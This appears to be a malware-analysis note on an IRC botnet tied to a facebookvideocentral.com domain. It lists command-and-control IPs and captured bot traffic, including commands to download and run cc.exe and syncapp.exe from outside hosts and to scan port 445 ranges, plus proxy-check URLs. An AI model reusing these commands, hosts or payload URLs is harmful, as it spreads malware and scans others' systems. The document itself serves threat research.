www.facebookvideocentral.com (IRC botnet hosted in Turkey, Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)

Remote Host       Port Number
213.202.225.40    80
213.202.225.48    80
74.206.242.164    80
46.45.164.166     81    (IRCd here)

NICK [N00_USA_XP_8072956]
JOIN #c
MODE [00_USA_XP_9406831] -ix
USER SP2-351 * 0 :COMPUTERNAME
PRIVMSG #bs :HTTP SET http://46.45.164.163/cc.exe
PRIVMSG #c :scan; Sequential Port Scan started on 174.133.89.0:445 with a delay of 5 seconds for 0 minutes using 15 threads.
PRIVMSG #c :scan; Random Port Scan started on 174.133.x.x:445 with a delay of 5 seconds for 0 minutes using 15 threads.
PRIVMSG #c :scan; Sequential Port Scan started on 192.168.80.0:445 with a delay of 5 seconds for 0 minutes using 5 threads.
PRIVMSG #c :scan; Random Port Scan started on 174.x.x.x:445 with a delay of 5 seconds for 0 minutes using 10 threads.
NICK [00_USA_XP_9406831]
USER SP2-307 * 0 :COMPUTERNAME

UPDATE:
Remote Host       Port Number
213.202.225.40    80
213.202.225.48    80
46.45.164.164     80
74.206.242.164    80
46.45.164.174     81    (IRCd here)

NICK [00_USA_XP_6506493]
MODE #t1 -ix
PRIVMSG #t1 :download; File download: 152.0KB to: c:syncapp.exe @ 4.9KB/sec.
PRIVMSG #t1 :download; Created process: “c:syncapp.exe”, PID:
USER SP2-176 * 0 :COMPUTERNAME
MODE [00_USA_XP_6506493] -ix
JOIN #t1

* The data identified by the following URLs was then requested from the remote web server:
o http://chillly.ch.ohost.de/aze/azenv.php
o http://bentseather.be.funpic.de/azenv.php
o http://46.45.164.164/cc.exe
o http://www.pr0.net/deny2/azenv.php

Hosting info:
http://whois.domaintools.com/46.45.164.166
